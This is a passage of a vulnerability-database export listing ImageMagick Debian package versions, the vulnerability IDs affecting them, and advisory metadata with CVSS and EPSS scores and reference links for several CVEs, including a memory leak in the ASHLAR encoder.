vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2017-13132

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jxwd-tm1k-yqa2

url VCID-kdw5-8y5z-zya5

vulnerability_id VCID-kdw5-8y5z-zya5

summary

ImageMagick: Possible memory leak in ASHLAR encoder
A memory leak in the ASHLAR image writer allows an attacker to exhaust process memory by providing a crafted image that results in small objects that are allocated but never freed.

```
==880062== Memcheck, a memory error detector
==880062== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==880062== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
==880062== 
==880062== 
==880062== HEAP SUMMARY:
==880062==     in use at exit: 386,826 bytes in 696 blocks
==880062==   total heap usage: 30,523 allocs, 29,827 frees, 21,803,756 bytes allocated
==880062== 
==880062== LEAK SUMMARY:
==880062==    definitely lost: 3,408 bytes in 3 blocks
==880062==    indirectly lost: 88,885 bytes in 30 blocks
==880062==      possibly lost: 140,944 bytes in 383 blocks
==880062==    still reachable: 151,573 bytes in 259 blocks
==880062==         suppressed: 0 bytes in 0 blocks
==880062== Reachable blocks (those to which a pointer was found) are not shown.
==880062== To see them, rerun with: --leak-check=full --show-leak-kinds=all
==880062== 
==880062== For lists of detected and suppressed errors, rerun with: -s
==880062== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
```

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25637.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25637.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-25637

reference_id

reference_type

scores

value	0.00018
scoring_system	epss
scoring_elements	0.0469
published_at	2026-04-26T12:55:00Z

value	0.00018
scoring_system	epss
scoring_elements	0.04656
published_at	2026-04-24T12:55:00Z

value	0.00018
scoring_system	epss
scoring_elements	0.04614
published_at	2026-04-21T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.17481
published_at	2026-04-12T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.1753
published_at	2026-04-11T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.17517
published_at	2026-04-09T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.17458
published_at	2026-04-08T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.17366
published_at	2026-04-07T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.17539
published_at	2026-04-02T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.17584
published_at	2026-04-04T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.1738
published_at	2026-04-18T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.17372
published_at	2026-04-16T12:55:00Z

value	0.00056
scoring_system	epss
scoring_elements	0.17429
published_at	2026-04-13T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-25637

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/30ce0e8efbd72fd6b50ed3a10ae22f57c8901137

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/commit/30ce0e8efbd72fd6b50ed3a10ae22f57c8901137

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gm37-qx7w-p258

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gm37-qx7w-p258

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-25637

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-25637

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2442114
reference_id	2442114
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2442114

reference_url

https://github.com/advisories/GHSA-gm37-qx7w-p258

reference_id

GHSA-gm37-qx7w-p258

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-gm37-qx7w-p258

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u6?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u6%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.15%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.15%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2026-25637, GHSA-gm37-qx7w-p258

risk_score 3.1

exploitability 0.5

weighted_severity 6.2

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kdw5-8y5z-zya5

url VCID-ky7v-89bx-3qc8

vulnerability_id VCID-ky7v-89bx-3qc8

summary ImageMagick: out-of-bounds access in function LocaleLowercase in MagickCore/locale.c leads to SIGSEGV

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10714.json

reference_id

reference_type

scores

value	4.0
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-10714.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2019-10714

reference_id

reference_type

scores

value	0.00326
scoring_system	epss
scoring_elements	0.55443
published_at	2026-04-01T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55546
published_at	2026-04-26T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55621
published_at	2026-04-18T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55601
published_at	2026-04-21T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55529
published_at	2026-04-24T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55554
published_at	2026-04-02T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55579
published_at	2026-04-04T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55557
published_at	2026-04-07T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55608
published_at	2026-04-08T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.5561
published_at	2026-04-09T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55618
published_at	2026-04-11T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55598
published_at	2026-04-12T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55581
published_at	2026-04-13T12:55:00Z

value	0.00326
scoring_system	epss
scoring_elements	0.55619
published_at	2026-04-16T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2019-10714

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.9
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://github.com/ImageMagick/ImageMagick/commit/07eebcd72f45c8fd7563d3f9ec5d2bed48f65f36
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/commit/07eebcd72f45c8fd7563d3f9ec5d2bed48f65f36

reference_url	https://github.com/ImageMagick/ImageMagick/commit/58d9c46929ca0828edde34d263700c3a5fe8dc3c
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/commit/58d9c46929ca0828edde34d263700c3a5fe8dc3c

reference_url	https://github.com/ImageMagick/ImageMagick/commit/edc7d3035883ddca8413e4fe7689aa2e579ef04a
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/commit/edc7d3035883ddca8413e4fe7689aa2e579ef04a

reference_url	https://github.com/ImageMagick/ImageMagick/issues/1495
reference_id
reference_type
scores
url	https://github.com/ImageMagick/ImageMagick/issues/1495

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1695477
reference_id	1695477
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1695477

reference_url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::
reference_id	cpe:2.3:a:imagemagick:imagemagick::::::::
reference_type
scores
url	https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick::::::::

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2019-10714

reference_id

CVE-2019-10714

reference_type

scores

value	4.3
scoring_system	cvssv2
scoring_elements	AV:N/AC:M/Au:N/C:N/I:N/A:P

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://nvd.nist.gov/vuln/detail/CVE-2019-10714

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-10714

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ky7v-89bx-3qc8

url VCID-m2q5-rtqv-tudu

vulnerability_id VCID-m2q5-rtqv-tudu

summary ImageMagick: Stack-based buffer over-read in the ComputeResizeImage function

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-6930.json

reference_id

reference_type

scores

value	3.3
scoring_system	cvssv3
scoring_elements	CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-6930.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2018-6930

reference_id

reference_type

scores

value	0.00571
scoring_system	epss
scoring_elements	0.68557
published_at	2026-04-01T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68576
published_at	2026-04-02T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68594
published_at	2026-04-04T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68571
published_at	2026-04-07T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.68623
published_at	2026-04-13T12:55:00Z

value	0.00571
scoring_system	epss
scoring_elements	0.6864
